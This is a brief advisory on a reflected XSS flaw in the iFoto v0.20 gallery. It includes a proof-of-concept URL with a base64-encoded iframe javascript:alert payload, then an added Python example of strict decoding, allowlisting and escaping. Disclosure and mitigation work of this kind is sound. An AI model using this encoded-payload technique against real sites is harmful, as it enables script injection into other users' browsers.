
iFoto v0.20-06/06/06



Homepage:
http://ifoto.ireans.com/

Affected files:

XSS Vulnerability:

The dir path used to show the image is base64 encoded, so to attempt this XSS example we encode our code in base64.

The code we'll be using is JavaScript in an iframe tag: [IFRAME SRC="javascript:alert('XSS');"][/IFRAME]

http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+ 
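
Because the parameter is base64 encoded, any filter that inspects the raw query string sees only letters and digits, so the value has to be checked after decoding and escaped where it is written into the page. The sketch below is an added example, not iFoto's code: the function names, the allowed file-name pattern and the <h2> output context are assumptions, and the only value taken from the advisory is the file= parameter.

```python
import base64
import html
import re

# The file= value from the advisory URL above.
ADVISORY_FILE_PARAM = "PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+"
# Constructed benign value: base64 of an ordinary image name.
BENIGN_FILE_PARAM = base64.b64encode(b"beach.jpg").decode("ascii")

# Assumption: legitimate values are bare image file names, no markup, no path parts.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9 _.-]{0,127}\.(?:jpe?g|png|gif)", re.I)


def decode_file_param(value):
    """Strictly decode the base64 parameter; None if it is not base64 or not UTF-8."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both subclasses
        return None


def render_unescaped(value):
    """Hypothetical model of the flaw: decoded text is written into HTML as-is."""
    return "<h2>" + (decode_file_param(value) or "") + "</h2>"


def render_hardened(value):
    """Validate the decoded text, then HTML-escape it where it is written out."""
    name = decode_file_param(value)
    if name is None or not SAFE_NAME.fullmatch(name):
        return None  # caller answers with an error page instead of echoing input
    return "<h2>" + html.escape(name, quote=True) + "</h2>"


if __name__ == "__main__":
    for label, param in (("advisory", ADVISORY_FILE_PARAM), ("benign", BENIGN_FILE_PARAM)):
        print(label, "| unescaped:", render_unescaped(param))
        print(label, "| hardened: ", render_hardened(param))
```

The allowlist rejects the advisory's value outright, and html.escape stays in place as a second layer in case the pattern is ever loosened.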
